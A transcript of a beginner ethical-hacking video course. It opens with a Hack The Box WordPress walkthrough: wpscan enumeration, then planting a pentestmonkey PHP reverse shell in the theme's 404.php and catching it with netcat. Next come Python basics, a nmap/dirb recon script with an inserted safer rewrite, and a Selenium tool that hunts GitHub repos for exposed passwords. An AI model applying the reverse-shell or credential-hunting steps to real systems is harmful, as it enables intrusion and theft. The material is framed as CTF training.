We don't need to mess with that, and it allows us to log in even though it didn't load very pretty. We can try again, and since that's not working, that's fine. The way you're going to see this on CTFs a lot, and you will see this in the future, is to come to the themes right here, and we really need this to load for us, and it loads for us, and now we can come to... well, that loads. There is one thing that you should always look to run on WordPress sites, and that is wpscan. So we can go wpscan, and then we would run --url, and then on this box we would run the box name, and the page was main. So this is going to look for the plugins, because sometimes there are vulnerable plugins on these WordPress boxes, especially if they don't update them, so it would look like this: --plugins-detection aggressive --enumerate, and then we want all plugins, so if we were to run this it would look like this. The reason you would need to run this plugins detection aggressive is because we wanted to enumerate all the plugins, not just the ones that it finds in the source code. So if you're ever up against a WordPress box, especially in a CTF, this is something you would want to run. But now that this has loaded we can come over to our themes and look inside of the PHP code right here, inside the 404 template, 404.php, and we can actually add in a reverse shell right here. So we've seen this earlier in the course: we can go php-reverse-shell, and then we can find pentestmonkey and just grab this entire shell, and we can just edit the IP address and the port number. So we'll go to the reverse shell, go Raw, Command-A, Command-C, back to this spot where we were, we can just paste all of that in, come all the way up to the top, change our IP address to 10.10.14.7, and we'll listen on port 4444. We can update this, make sure we have... see if we can start up a netcat listener, listening, and it tells us this right here, updated successfully, so we can come back
to whatever page that was that we were just on, this one right here. Now if we delete this and we just run this, it should execute that code for us that we just saved. It says that it has updated successfully; make sure we have the port and IP number right. It is, and we got the reverse shell back over here, so whoami, and we are finally on this box. Sorry for a bit of the workaround, but this is just really the life of doing any kind of hacking: it is going to be a lot of trial and error and fixing mistakes. So this is WordPress. These were a couple of WordPress boxes; you're going to see WordPress in the future, especially in the world of bug bounty hunting. WordPress is really popular, and this is just a few different ways to go about hacking WordPress sites. So with that we will continue on. What comes next is usually the question of what kind of programming do I need to know, so in this video what we're going to cover is the Python that I think you need to know as you're entering into cyber security. This is an introductory course into Python for the purpose of cyber security. I have tried to keep it as streamlined as possible to keep you away from having to watch a six-hour course on Python for cyber security that is just full of stuff that I think you're not really going to need in the future. So this is a beginner course, and if you have any questions as you're going through it, please leave some questions down in the comments. Excited to go ahead and show you guys how to install PyCharm on your Linux VM. If you have a Mac or Windows it's really straightforward: you just go to JetBrains, where you download PyCharm (I'll have this link in the description), and you'll click Windows, Mac, or Linux, and then you'll just hit download and it will automatically start to download, unless you're on Linux. So I have had to do this for several virtual machines that I've had; it won't download, and so what you have to do is right-click the direct link and you'll copy link, then you will go to your
terminal and you'll run a wget wherever you want this file to be saved. So if you want its own PyCharm folder, put it in its own PyCharm folder; for me it is in my Downloads, and you can save it wherever you want. You'll hit enter; this might take a little bit depending on your internet speed, and then you're going to unzip it wherever you downloaded it with this command right here, and then it will unzip, a bunch of files will come out, and then you will be able to cd into the folder. So for me I will cd into my Downloads because that's where it is, and then I'll go into pycharm, and then I'll ls inside here, and I'll go into my bin, and then this is the executable I want to launch in order to launch PyCharm. So I will type in bash and then I will type in pycharm.sh, and it will automatically launch PyCharm for me. So this is how you get PyCharm on Linux if you are wanting it on your Linux. I usually write everything on my Mac, and then if I need to run the code over on Linux I will pull it over to my Linux machine and run it over here. So with that we will get started in the next section. All right, we are ready to start our Python course, so we're going to start out very simply with a string. A string is a sentence that is a data type, so we're going to have several different data types coming up, but a string looks very simple; it is what I think of as a sentence in English. So you just have hello world. A string is always going to be stored inside of quotations, so if we were to print this it would print right here, hello world, for us, and if we change it, it's going to change along with us. So this is really simply a string, and we can store strings inside variables, which is going to be coming up in the next section. But first, before we go on, you will see sometimes that you need a string on a new line, especially if you're going to export something into a CSV file; you're going to want things on new lines, and at the end of your string you can type something like this,
and then say hello world number two, and then we can print this, and we have hello world and hello world number two. If I wanted to get rid of that space I would do it this way, so we have hello world and hello world number two. Another way to go about printing this would be like this: so print, and then we put our quotations and we say hello, and then we can add this like this, hello world, just like that. Now if we were to print it we have hello world, hello world number two, and then hello world; you see how there's no space right here. This is something that I run into regularly, and I just had it happen the other day. There's two different ways you can put a space right here, and I'm going to show you the easiest way first: just add a space right there, rerun it, and now you have a space. But I think it's helpful to know more than one way to do this, so you can add another quotation and put a space in there and add another plus sign, so you can run it this way and you still have that space. It's really important to know this right here because sometimes you'll be running a for loop and everything is just smashed together and you want a space in there, and you can add spaces simply just by doing this. So what I'm showing you right now, you may be thinking this is not ever going to be helpful, and I wouldn't be showing it to you if this wasn't helpful; it's something you're going to run into in the future. So this is a very streamlined course, and I'm showing you just what you need to know in the world of cyber security. Now we're going to be covering something called a variable, and a variable holds the place of some kind of data that we're going to want to use later. So we'll go ahead and comment this out; on a Mac it is Command and then question mark, and so we'll comment that out. So now if we run our program there's no output, and we're going to look at a variable. So a variable can be something like this: name, and then the name Jim. This name is going to hold whatever is
right here, so this is our variable, which is going to represent the name Jim. So if we come down here and we print and then we type in name and then we run this, it's going to print what is stored inside this variable. When we look at variables, one of the things you're going to want to be able to do, especially in the world of cyber security if you ever want to write your own tool, is you're going to be saving variables, only they're going to be input variables. So if we were to go like this and we say name equals input, and then we type what is your name, and then we'll want a space right here so when we type in the prompt it has a space, we'll comment this out and then we'll print name. So we're going to print the variable, whatever the user inputs here, so now we can say what is your name, and we can say Tom, and when we hit enter it prints Tom. And there's something else that's really cool that I use all the time; it's called an f-string, and what you do is you add an f at the beginning of your string, and then you can print variables inside your string. So we'll go ahead and put name inside here, and so we can say hello and then the name, so we'll run this: what is your name, Tim, and it puts out hello Tim. So this is an f-string; this is something you're going to want to know, this is something I use all the time. In the coming videos we're going to look at data types and how we can pull information out of a specific string, and this becomes really useful whenever you run a script on a victim machine or on your target machine or your target server: you may get a lot of output that you don't really need, and this is a good way to start extracting data. So we'll start that here in just a moment. Okay, it is time to draw out some information from our string, so what we can do here is we can save a variable and we'll call this variable name, and we can put inside of our name Tommy. So we have Tommy here, and let's say we want to grab just this m right here; what we can do with
this is we can say print, we want to print our name, and then we add some square brackets just like this, and when you're running Python it always starts at zero, so it goes zero, one, two, and so that first m is going to be 2, just like this. And so if we run this it's going to print that m for us, and just to show you, if we want to print the T we would enter a 0 here. This is one of the most basic ways to draw out information, and it's going to get a lot more complex as we go, but this is what the square brackets do when you see them, and when we start to tackle lists and arrays these square brackets become a really useful tool to remember. So as we continue to go through this, I want to pause right here and I want you to go ahead and play around in your own text editor: make some print statements, make them on new lines, add in some spaces, make some inputs, and actually practice gathering information. Maybe have two or three inputs and have it print things back and forth, and you have a little conversation with your text editor. So I'm going to go ahead and give you this challenge for you to play around with the things you've learned so far and try and really ingrain this information into your mind. These are the foundations of Python programming, and you need to know and understand how they work. You're going to notice that you can name variables whatever you want, and I name my variables really poorly, mostly because the programs I write I write for myself and I am not working with a team of developers, but maybe you will someday. When you name your variables you can name them whatever you want, and you'll want to make them names so other people can understand what is going on. So if you look at some of the code I've written in past videos, I do this right here: I name everything like this, and it is not really the best way to go about naming these. So I'll name one guy one, and I'll go guy two, and he'll equal Bob, and then I'll come down here and I'll
print guy two, and then I run this, and then I have Tim and Bob. You can name variables whatever you want, literally; you can go whatever I want, and you can make this a variable, and then you can come down here and you can print whatever you want right there. So you can name variables whatever you want, so I would recommend getting in a good habit of making your variables something that you can recognize. It's a very bad habit that I have because I make my variables so that people cannot read what I have done, so this is something I'm trying to get better at, but I probably won't because this is a bad habit that has formed over many years. But I want you to have a good habit of naming your variables something that you can understand and other people can understand, so as you go through and work through your challenge, try to name your variables different things that you will be able to understand in six months after you have written a program and you need to go back and edit it. Okay, I have created this little challenge here for you. If you want, you can go ahead and pause the video and open up your text editor and see if you can create this little program right here. So we want to, one, create an input with a greeting, so just say hello, what is your favorite food, let them put it in, and then take another input and say what is your favorite hobby, and store that also in a variable, and then we're going to print with an f-string their favorite food and their hobby. So if you want to give this a go, you can go ahead and give it a try; if not, we will start it now. So we're going to start out with create an input with a greeting, so we'll just say print hello, and then we're going to take an input, but we've got to save it as a variable, so we'll save this as food, and it's going to equal an input, and inside the input we're going to have the question, what is your favorite food, question mark, space. I see that we have a typo here on all three, and then that's going to be saved as
their food. Then we're going to say input, and we'll just save this as hobby, and we're going to take an input and we're going to say what is your favorite hobby, question mark, space. And then we're going to print with an f-string all of this together, and we'll say print your favorite food is, and then, if you remember, we need our f-string here, and we should grab our curly braces and say food, and your favorite hobby is, curly braces, hobby. Now when we run this, if we did everything right, it should print for us this final statement after we give these inputs. So we say run, and it says hello, what is your favorite food, and we'll just say chips; what is your favorite hobby, running; and it says your favorite food is chips and your favorite hobby is running. So this is a simple input form, and it's going to print out with our variables that we have stored, and this is a good practice because when you write a program for a tool, maybe one that you develop in the future, you are going to want to know how to do inputs, so that way you can take the input, save it in a variable, and then later do something with it. So later on in the course I'm going to give you a practical example of taking input and then running it in a program that is really helpful, and I will cover that when we are ready for it. All right, so we have covered the string so far. This integer is a whole number, so if we say int we have a number of seven. Floats, we're not really going to use these a whole lot in the world of cyber security; they have a point within the number, so 3.14 would be an example of a float. To date I cannot remember a single time I have used a float in cyber security; usually that's more towards data science or something of that nature. A Boolean is a true/false; you will want to remember Boolean. We'll cover these a bit in the future when we do our while loops; we'll be using the true/false. So these are some of the different data types, and just to get an idea of what these look like, if we save a
variable and we make it a float, and we say like one two three, and then we print this, it will tell us what we have. So we can come down here and we can say print, and then we can put type, and then we can put in our variable, and when we run this it will tell us that we have a float, and if we put in an integer it will tell us that we have an integer, and so on and so forth. We can do this with an A, and then we can also do this with a string, and we can hit run, and it tells us we have a string. Sometimes we will do something like this, and then we have this saved as a string here, and then when we go to add this to something else we can get an error, and it's because we have a string and we'll be trying to add together a string and an integer, and it won't work. So we'll go variable two equals 3, and then when we say variable three equals variable one plus variable two, we're going to get an error, and it's going to tell us that you can't add these together. So this is one version of how these matter. Another version of this is, let's say we want to print, and we say we have an integer right here and we want to add it to a string, and we can go like this and we say 70. What do you think is going to happen? It tells us we can't add these together, but if we take this and we turn this into an integer, what will happen now? Now it works. So this is the difference: this is an integer, and this is a string unless we declare it to be an integer, and you can do the same thing with floats, so I'm not going to cover those. And then what happens if we do this right here? What do you think the output will be? And the answer is 7070. So this is the difference between integers and strings and how they work with numbers and data. So if we wanted to, we can turn both of these into integers, and this is the last example, I promise; I don't want to bore you with adding these together, and then we say enter, and we're back to 140.
So this is a little bit of strings, integers, and Booleans, and we'll kind of skip floats because I don't think we'll really need them, but it's worth mentioning so you know they're here. And with that we will continue on with our next challenge. Okay, so we have these numbers here, number one two three four five, saved as num1, and then num2, and then num3. What I want you to do is to write this to your console, or write this to your text editor, and then I want you to add this variable plus this variable and see what the output is, and then I want you to take the second number in num1, so it would be this 2 right here, and I want you to add it to the second number in num3, which is this seven, so your output should be nine. I want to see if you can figure that out, and then the third challenge is to take num2 and change num2 into a float and print the type to the console, so that way the console tells us that it is a float. So if you'd like to go ahead and pause and give this a try, you can do that now, or we will go ahead and tackle this right now together. So what we are going to do first is we're just going to print, and we're going to turn this into an integer, and we're going to go and write in num1, and then we'll add this as an integer, and then we will say num2, and this needs to be closed off or we will get an error, and this should print it for us. So it tells us here is the total if we add those together. And then the second challenge is to add the second number, so we'll just take this. Just a heads up: copy and paste in programming is always a bad idea, because if I have a bug here, I just now copied and pasted it and I have two of them. But what we're going to do is we're going to take this and put in our square brackets, and if you remember it says 0, 1, so we're going to say one, and then we're going to say one. I guess I didn't really need this, and then we'll print this, and our output is nine, so now we've grabbed the second numbers,
And then our third challenge is to change number two into a float so that it prints float. So what we want to do here is just say print, and then we're going to tell it we want a type, and we want to print out the type of num2, and then above that we're going to just type in num2. You can do this two different ways; I'm going to do it this way. I'm going to say num2 equals num2, and we'll just go like this and we'll type float and we'll close this off, and now if we print this it tells us it is a float. And we will continue on with our Python course in the next section. Okay, we are going to do a walkthrough of if, elif and else statements. So these are the instructions for the little program I'm going to write, but when I finish this program I'm going to give you a challenge to do something similar on your own, so I'm only going to give one example, and you're going to need to pay attention and maybe watch this walkthrough twice and then go on and try the challenge. So the first thing we're going to do is: if you are under five, you are a kid. So our if statement is going to first need an input from the user that is going to tell us what is their age. So we'll just say we have a variable and we want it to be an integer, and we want an input, and we're going to ask them "what is your age?" question mark space, and we have to have that space, otherwise it's really ugly in the terminal. And then we're going to start our if statement, so we're going to say if this person's input, which is their variable, is less than the age of five, then we want it to print that they are a kid, so we'll print "you are a kid". Now one thing we want to do is if they hit the age of five we'll need an equal sign here, otherwise, I'll just show you, we'll need an else statement so this doesn't error out. Actually, we'll just let it error out. We'll say "what is your age?" and they say five and we get no output, because this doesn't include five, remembering that the computer starts at zero and
then it's going to stop at four. So if we want to include five as a kid we'll need that the variable is less than or equal to a five. Now if we put the five in here it will print for us "you are a kid". So what we need to do next is we're going to type in elif, because we're going to make an elif statement, and we're going to say the variable is less than 15, and the reason we don't have to worry about anything under a 5 is because it will catch this if statement, and then this whole program we write after this will stop and the computer will actually skip it, so we don't need to worry about adding anything else in here. And we can say, actually, if you are less than or equal to 15 then we are going to print "you are a big kid". And then for the final elif we will say the variable, and we will say if it is greater than or equal to 21, and that's ugly, and we will say print, and we're going to print "you are a bigger kid". And now we're going to put in an else statement; we're going to print, for anything that's over 21, we're just going to print "you are old". So now if we run this, and we rerun the program, we run it and we say how old are you, and we say three, we get "you're a kid"; if we say 13 we get "you're a big kid"; if we say 18 we see "you're a bigger kid"; and if we say you are 44 we get "you are old". Now, because we're going to be using this as a tool for us to be able to write tools and modify tools, I'm not going to cover this because I think that it's not really necessary for cyber security, but if somebody were to run this and they put in the letter A, it's going to crash our program, because the letter A is not a number, it's not an integer. So what we'd have to do is we would have to make this so that if they put this in and it was an A it would print "enter a number" and then rerun, but we're not going to do that because it's not really necessary for cyber security, it's just something to be aware about. Now what's coming up is your challenge. Let me delete
all this and I will write up your challenge for you in the next section. Your challenge here is to take the temperature from the user and then tell them: if it is less than 20 degrees you need boots, and this is from the US so I'm running in Fahrenheit not Celsius; and if it's less than 30 you will need a coat; if it's less than 70 you will need a jacket; if it's over 70 it is nice outside. So take this information and make a program with if, elif and else statements. Okay, so here is how I would go about doing this. I would take an input and it will say "what is the temp outside?", and this will need to be an integer because we're going to be comparing this as a number. So we'll say if var is less than 20 then we're going to print "you need boots", and we'll say elif var is less than 30, print "you need a coat", and then we're going to use one more elif here, elif var is less than 70, print "you need a jacket", and then finally we'll do else, and it's above 70 then it's nice out, and we don't actually need to put anything in there because this is an else statement, so everything that's above 70 will automatically print "it is nice outside". So when we run this, if we put 12 we need boots, if it's 22 we need a coat, and if it is 65 we need a jacket, and if it's 85, in my opinion, it's perfect outside. So this is the if and elif and the else statements. We're going to be moving into for loops, and later we're going to look at nested if statements, and they'll look something like this: if it's less than 20, and then we can say if var is less than, we'll say it's actually greater than 25, then we can print "you need boots", and then we'll print something like "gloves". So nested if statements look something like this, and you can have nested if statements, just so you're aware of it. So if we say it's 26 it will, oh, because we're hitting this one, we'll say this is 15.
So if we say that the temperature is 16 we hit "you need gloves" and "you will need boots". So this is a nested if statement. We'll cover these a little more in the future; I don't know how much you will need these nested if statements, I use them every now and then, so it's nice to know that you can run nested if statements, but for now we're going to move on to our for loops. Before we get into for loops too far, I want to show you why for loops are important, and I also want to show you why lists are important, which we're going to be going over here in just a minute after we get the basic understanding of a for loop. So this is a program I've shown before; don't worry about what it looks like, it looks kind of complicated but it's really not. What happens is you put in a repo that you would like to target on GitHub, to go and search for all of the usernames, passwords and files that just shouldn't be made public. So in this case it's looking for passwords on GitHub, but what we have down here is a for loop. So this for loop right here, we have an empty list, which we're going to cover in a second, and it goes out to GitHub, right here, and it will go through all these links, everything you can click on, and it's going to narrow it all the way down to the repositories, and it will click this link, and then it'll click the file, and then it will click the raw, then it copies this entire thing and it puts it into a CSV file and then checks for the word password. So that's the program itself, but what's important to remember is what happens is it goes out and it pulls all the links and puts them in a list, then it goes through this for loop, and it takes all of these and it says for every one of these items that is inside of the links, which is actually this variable that I have up top, it's going to do something. So for loops are very important, you can see I have another one right here. So for loops, we are going to need them; lists, you
are going to need them as well, and I just wanted to show you this because sometimes what happens is you'll be going through trying to learn something, and I'm showing you something very elementary, and you are like, why do I need to know a program that tells me to put on a jacket? This is all building up to something that is going to be able to help you build tools, and more specifically, if you're new, just be able to read through exploits and be able to edit them, because you're going to need to know how to read Python and edit exploits as you grow in the world of cyber security. So here is a very basic for loop, and I'm going to show you it in a string because we've already covered strings. And all this does is we have our variable string right here that is holding the "hello world", and so the way the for loop works is it says for i in string. So this i right here is going to be another variable that holds one letter each time the for loop runs; this i is going to represent one letter, and in a list it's going to represent each item in the list. So this will run, I'm gonna run it so you can see what this looks like. The way it runs is it goes for i in string, so it's going to grab the first letter, which is going to be the H, and then it prints it, but the for loop is not over, so it runs the loop again and it'll grab the E and it'll print just the E on a new line, and then it goes through and it runs every single time until it is out of things to run, and then it closes the loop. So this is how for loops work. I'd like for you to go ahead and write out your own for loop, and maybe put something different in here, and try to get an understanding of how it works. And if we wanted this to print all of this together, you would have to store this into a new variable and then print it outside the for loop, down here like this, and this is where we would print our new variable. And we're going to cover this in lists, because this is something that you will need to do in the future. So go
ahead, play around with the for loop, write one, get an understanding of how it works. If this doesn't make sense, re-watch it and hopefully it makes sense. I know after teaching for loops to several different students that for loops sometimes can be hard to understand, but they are really useful and something you need to learn. So we're going to be covering lists in the next section. We're going to be looking at lists, and a list is something that is going to be useful because we're going to be appending to lists all the time within our for loops. So a list can look like this: my list equals square bracket, and lists always go inside of square brackets, and we can say item one, and then comma, item two, and then we can do an item three. So we have our list here, and if we want to run a for loop through this list we will say for i in my list, print i, and now if we run this it will run item one, item two, item three. So this is a list. We will be using these in the coming lessons and they will be helpful for you in the future. As you've seen in this program, I have two lists right here and they are used regularly to append to, so a list is something you will need to know. So go ahead, make your own list and see if you can loop through your list, and maybe try and just print something like this later, just print item two. So you'll have item one, two and three, and then print number two, and see if you can remember how to do that. If you have forgotten, it would look something like this: print, and then we can say my list, and then we can put this in square brackets, and we'd say 0, 1, and then we have a one, and now we can print this, and we have one two three two. So that is going to be it for the list. We're going to move on and we're going to start using lists in a more comprehensive manner. So we're going to try a while loop now, and the way we're going to do a while loop is by using a boolean. I like to set a variable and then set it to true, and then at the end of the while loop I will set it to false. So the way this
works is, make a variable, and we'll just say variable, actually we'll name it "on", that's a good way to name the variable, and we'll say on equals true. And then we'll say while on, and we'll make a variable and we'll just call it variable because I don't know what to name it, and we will take an input and we will say "continue running while loop", and then we'll put a y or a no, so would you like the while loop to continue, yes or no. And then we can do something like this, and then we can set a variable up here and say i equals zero, just so you can see how many times this is running, and then we'll say i plus equals one, and then this should just continue to run. And then we'll put an if statement, say if the variable equals equals n, then we'll say that on equals false, and this will kill our for loop. So now if we run this it'll say "would you like to continue running the while loop", and we will say yes, yes, and then when we say no it'll kill the while loop. I forgot to print our i so that we could see this, so now we can say would you like to continue, yes, yes, and you can see our variable: every time the for loop runs our i gets added to one, so our for loop has run now, it says seven times, eight times, nine, ten, and then when we're done we can say no and we can end it. Okay, we are going to be starting functions, and just to be clear, I have not pre-written any of the code we are about to go over, or mostly anything we've gone through in this course, that's why you've seen me make mistakes. And so as we start functions, I'm going to try and make this a little more realistic for us, so that when we are thinking through functions and writing code in the realm of cyber security you can start to get an idea of how this can be used. So we're going to start with functions, and a function just calls something very specific that we want to happen. So we can just say, we'll call it my function, and then the way your function is
going to start is with a def my function, and then we close it off like this, and then down here we want our function to do something very specific, so we can say print, and then we can say "it worked". And the way a function gets called is usually somewhere further down inside the code something happens and it triggers this function back up above it for it to actually do something. So what would happen in order to call this is we would just say my function. Now when we run this, when the computer reaches this right here, this closing bracket right here, I usually like to think of this as the call sign for the function, so if we run this it's going to print "it worked". And this will become more clear as we write more of these, but this is the basic concept of functions. And one thing we can do with functions is we can pass through variables, so we can say something along the lines of i, and then we can say, well, we'll make it a different variable, we'll say variable equals i plus 3, and then we can say print, and then we can say we want to print our variable. And so in our function we can pass information through like this, so when we say my function we can now say input, and then we can say "what would you like to add", and because this is a string we're going to need to make this into an integer, I guess we can go and make it an integer right here, and we can say int and then we can close this off. Now when we run this it's going to ask us what would we like to add, and we can say three, enter, and it will say 3 plus 3 equals six. So this is a very basic function. So we take some kind of input right here, this is where we call our function, so now this function is being triggered, but we want to pass something into our function, some kind of variable or some kind of information that we've grabbed somewhere else, and what happens is it can now use this inside the function. You may be thinking, in what case would I possibly ever need to use this? And so I'm going to just show you my GitHub
dumpster diving tool once again that I've used multiple times on this channel. This right here, where it's grabbed a repo, I call this function, and it's going to loop through to see every single file inside of the repo: is it a Python file, is it a JavaScript file, is it an XML file. And what happens is when I pass this repo through, it now is able to use this variable that has come from somewhere else inside this function, and then I do the same thing up here, I pass through a variable inside of a function. So this is really important to know and you will use it, and we're going to go ahead and give another example. And actually, before we give another example, I want you to try and write your own function and see if you can get it to take an input. So let's take the input and make it the first letter of your name. So I'll write out the instructions: you want the first letter of your name, and you want to take this as an input, so we'll say input, and then you want to call a function that adds your first letter to the rest of your name. So here's your instructions: you're going to make a function, and it's going to take a variable, and that variable is going to be the first letter of your name, and then you are going to add that to the rest of your name. So I hope this makes sense, and I'll go ahead and walk you through what this would look like. So we'll go def my function, and then we are going to call this function, and we're going to pass through, let's use i as our variable. So that stops giving us an error, whenever this is giving us an error and I can't stand looking at it, I type in pass, and that will not give us an error, and we'll come back and delete that in a second. And we're going to call my function, and we're going to take another input, and we're going to say "what is the first letter of your name?" question mark. Now we can delete this, and we're going to come back up here and we're going to use this, and we're going to say that my function is going to take this input and it's
going to be passed through as i. And so down here, we're just going to say my first name is Ryan, so we will say, we'll call it the variable, equals i plus, and then we can put the rest of this inside of a string, and we can say something like this, and then we can print our variable. So when we run this, if I put an R in here it'll print out my name. So I hope you're able to figure this out. Maybe try to come up with another way to write a function, and practice writing functions and see if you can get the hang of it, and in the next section we're going to go over something that will show you how this can be really helpful in building your own tool. Okay, I hope you have played around with functions and you are now ready to try and become a little more advanced, and we're going to try and gear it towards cyber security now. And I hope you're familiar with maybe the nmap scan and some other tools, so we'll just use an nmap scan right now, and we'll just say we're going to call a function and we'll call it nmap, and this is going to take a variable, and we'll actually call it the IP, because we're going to take an IP address. And the way I like to run my nmap scans is, they'll look something like this: nmap -A, like this, and then we're going to pass in the IP address, and then I like it to be verbose. Now in order to get this to run we would have to import a module called OS, but we're not ready for that, so this is just to show you how the functions will work. And so I will wrap this entire thing inside of curly braces, oh my God, dashes in here that shouldn't be there, I don't know why I did that, and then we'll wrap this inside curly braces. This is not supposed to be inside curly braces, that is supposed to be inside of quotes, and we'll make this an f-string, and we'll say our variable equals, instead this would be an OS command if we were actually going to run this in our Linux machine, or Windows, whatever you choose to use as your hacking VM. And now what we do is we'd come
down here and we would say something like nmap to call our function, and then we're going to take an input, and we're going to say "what IP would you like to scan", and then right here we are going to print "running nmap scan against", and then we will put in the IP address, and this will need to be an f-string. Or sorry, that will not be the IP, that will be against the variable, so it will tell us that it is running the nmap scan right here. Okay, so when we run this we can say who would we like to scan against, and we'd say 192.168 point something point something else, then we run this, it'll print "running nmap scan against" and then it gives us the output right here. So this would be a way that, if you were trying to write your own tool to automate your recon, this would be one of those ways you would use a function in order to automate your recon. And there's a lot more you can do with this IP address; you could pass it into multiple different tools, and then you have written your own tool. So this is how we can use functions in cyber security that are really helpful for us, and whenever you're going for a certification it'll be really helpful for you to be able to read through functions and maybe modify them, especially in exploits, because vulnerabilities and exploits change over time, and you will need to be able to change and modify different exploits that you come across on Google in order to gain access to a machine. Before we end this course I want to give you a little bit of an introduction into making your own tools, and then I want to challenge you to add to this recon tool that I'm about to show you, and you can start to build your own tool for recon, and it'll help you remember the Python code that we've gone over so far in this course. So I've gone ahead and connected to Hack The Box and launched the box Devel, and so I want to just show you what OS system does. So we'll import OS system, you've seen this before, and this is just our
operating system; it just means we're going to be able to tell our Linux machine to carry out commands the exact same way you would inside of a terminal. So we're going to make a function and we're going to call it recon, and we're going to pass through an IP address. Really, if you remember, this is just a variable that we're going to be passing through into the function. And then we're going to call our function down here, and we'll just call it recon, and then we're going to ask for an input, and then we're going to say "what IP would you like to scan", and then we'll put a question mark and a space there so that way it's not all smashed together. And now inside of here, what we can do to make this program run our recon and automate it for us is we can type os.system, and then we can put in here, we're going to make this an f-string, what we want to do. So we're going to run an nmap scan, and we're going to want all outputs, we're going to run it on all ports, and just in case it is blocking the ping we'll put the P option, and you don't have to put this in here, it's optional, and then we are going to put in the IP address that we run through, and I really like to run everything as verbose. So when we run this you'll be able to see, it'll say "what IP would you like to scan", and I'll put in the IP address, and it will now start the scan for us. So this is the same thing we would see inside the terminal; we're going to see port 80 and 21 is open, and at the end of the scan it will tell us everything that has happened on this scan. Now you can add to this, we'll stop this. You can add to this same scan: when it gets done running the nmap scan, you can come down here, and maybe you want to look for different directories, and so you could go os.system, and we're going to make an f-string, and we can add in, maybe we want it to run dirb, and we want it to run on the same IP address that we've already passed in, and it will now launch this right here as soon as it gets done
with nmap. And the cool thing about this is, if you have your own recon tool set up you can go ahead and run the program, send over the IP address, and then you can leave and it will automatically run your recon. Or maybe while your recon tool is running you can do other, more manual enumeration; maybe it has port 80 open and you see that real quick with the nmap scan and you want to start looking at what's on port 80, and it will run your nmap scan, it will run your dirbuster for you, and maybe you want to run a wfuzz, or maybe you want to run a Sublist3r. I want you to go ahead and start off with what I have given you right here, and you can add to this tool with the information that you have learned so far. Okay, so in this video we're going to be covering enumerating APIs, or back-end APIs, and I see this in bug bounty programs sometimes, and I'm sure you guys have come across a page that looks exactly like this: you come in, you go to the URL and you get some JSON in return. And I actually was looking through a bug bounty program just a few days ago, and I actually saw it said backend and then api dot the-program dot com, and so if you're new and you're not really sure how to enumerate APIs then this video is going to be for you. We're going to keep it really short and specific so that way you can go out and do this yourself. We're going to be looking at the box Backend on Hack The Box, but we're not actually going to walk through the box. All right, so I have decided to include this little section here on making a GitHub recon tool in Python for you, because I figured, if you have gone through my first bug bounty course, I had this section on understanding the basics of Python, and as you become a more well-rounded bug bounty hunter or penetration tester your programming skills are going to improve as well. So I decided this tool was easy to make; it includes a lot of really easy concepts within Python, but it is actually a lot of code, I guess, if you are a beginner. If you're going
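The nmap function from the functions section and the recon(ip) tool just described both hand an f-string containing the user's input to os.system, which passes the whole string to a shell. The added example below is not the course's code: it keeps the same shape (one function, one input, nmap then dirb) but builds each command as an argument list for subprocess and checks that the input really is an IP address first, so a value like "10.0.0.5; id" is rejected instead of reaching the shell. The flags (-A, -p-, -Pn, -v) are an assumption about what was typed in the video.

```python
"""Recon helper in the shape of the course's recon(ip), rebuilt so that the
scan target cannot carry extra shell commands. Added example, not the
course's own code; the exact nmap flags are assumed."""
import ipaddress
import shutil
import subprocess


def validate_target(target: str) -> str:
    """Return the target as a normalised IP string, or raise ValueError.

    ipaddress.ip_address() rejects anything that is not a bare IPv4/IPv6
    address, so shell metacharacters never make it into a command.
    """
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError(f"not an IP address: {target!r}") from None


def build_nmap_cmd(ip: str) -> list[str]:
    """All ports, skip the ping check, verbose, aggressive scan (assumed flags)."""
    return ["nmap", "-A", "-p-", "-Pn", "-v", validate_target(ip)]


def build_dirb_cmd(ip: str) -> list[str]:
    """Directory brute force against the web server found by nmap."""
    return ["dirb", f"http://{validate_target(ip)}/"]


def run(cmd: list[str]):
    """Run one tool without a shell; skip it cleanly if it is not installed."""
    if shutil.which(cmd[0]) is None:
        print(f"[!] {cmd[0]} is not installed, skipping")
        return None
    # An argument list is passed to exec directly: no shell, no injection.
    return subprocess.run(cmd, check=False).returncode


def recon(ip: str) -> list[list[str]]:
    """Validate once, then run the tools in order; return what was launched."""
    cmds = [build_nmap_cmd(ip), build_dirb_cmd(ip)]
    for cmd in cmds:
        run(cmd)
    return cmds


if __name__ == "__main__":
    recon(input("What IP would you like to scan? "))
```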
to continue down the road of penetration testing or bug bounty hunting, you're going to want to develop your own tools and have a better understanding of Python, and I figured this was a really great tool to give you an idea of things you can actually build that are useful. And even with this tool you can add on to it and make it your own and give it new functionality. So I've decided to include this in here because it will help you and save you time in the future if you decide to continue bug bounty hunting. So enjoy this tool and use it well. Okay, so the setup for Selenium is going to take a little while, and I don't want you just to close out and think this is too hard. I want to show you how cool this tool really is. So if you follow along with this video, in the end you're going to understand all of this code, and then you're going to have a program that goes out to GitHub for you and goes through the repos, opens all the pages, goes through all the links, and pulls out if there's any passwords or not stored in the code on the GitHub page. And so it will look like this when you run it, and it automatically went through all of those links on GitHub, it pulled down this page right here, it says a password was found at this link, and so if we click on this link it'll take us to this page right here, and we can look at this and we can go to the raw and we can type in password, and right here it tells us it has found password, and the password is admin, and it found this on this GitHub page. So that is where we're going, and if this tool looks like something you would like to add into your bug bounty or penetration testing arsenal then you can stick around and go through and make this tool with me. We start with our program, and using Selenium there's a few things that you have to do, and I'm going to walk you through installing this both on Mac and Windows. You will need your PyCharm editor that we used in the first Python for Ethical Hackers, and now
you are going to need Google Chrome installed, and so I'll have this link down in the description. If you don't have Google Chrome, it is best if you use it; you can also do it with Firefox, but it's really easy if you just download Google Chrome and follow along with me. And we're going to also need to install the ChromeDriver. So what you will need to do is download the version of the ChromeDriver that matches your Google Chrome installation. In order to find out what version of Chrome you are running, you will come up here, click the three dots, you will go down to help, and you'll click "About Google Chrome", and then I am running this version right here. In order for me to update my Google Chrome, if it doesn't match any of these over here, then I would just have to close out of Chrome completely, you just go and close the app and it will automatically update. And I am running this version right here, 101.0, and I would come back over here and I would say 101.0, for me it would be this one, I would click this and then it will bring you to this page, looks exactly like this, and it will tell you what version of software you're running and you will click that version. So if you're running Windows as your operating software you click Windows, Mac or Linux; for Mac I use this one right here. And when you install it, remember where you put it, because we are going to need to know the complete file path in order to reach the ChromeDriver. I have mine stored right here in a folder on my desktop, so if I open this up I have my chromedriver right here, and I will need to know where this is, we will need to know the entire path. And you can see the full path by right-clicking and going to "Get Info", and then it will tell us where the full path is at right here, because it tells us where, and then we see 